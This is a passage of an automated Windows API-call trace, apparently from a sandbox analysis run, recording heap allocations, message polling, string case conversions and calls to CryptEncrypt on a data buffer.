CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9648, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0266.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.512] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0266.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0266.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3ba0 [0266.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2110 [0266.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0266.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0266.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0266.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0266.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0266.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0266.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0266.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0266.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0266.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0266.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0266.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0266.513] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x174d9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x174e0) returned 1 [0266.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0266.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0266.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0266.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0266.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0266.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0266.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0266.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0266.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0266.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0266.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0266.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0266.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0266.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0266.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0266.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0266.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0266.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0266.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.517] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0266.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0266.518] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.518] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0266.518] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0266.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.519] CharLowerBuffW (in: lpsz="byte[95456]", cchLength=0xb | out: lpsz="byte[95456]") returned 0xb [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0266.519] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0266.522] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0266.522] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.522] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0266.522] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.522] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.522] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0266.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0266.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0266.523] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0266.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0266.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.523] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34c9738*, pdwDataLen=0x8bef68*=0x174d9, dwBufLen=0x174e0 | out: pbData=0x34c9738*, pdwDataLen=0x8bef68*=0x174e0) returned 1 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0266.525] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0266.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.526] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.526] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0266.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.526] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0266.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0266.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0266.527] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.527] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.528] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0266.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.528] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0266.528] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.528] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0266.528] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.528] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0266.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0266.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.528] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0266.528] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0266.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0266.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0266.529] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0266.529] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 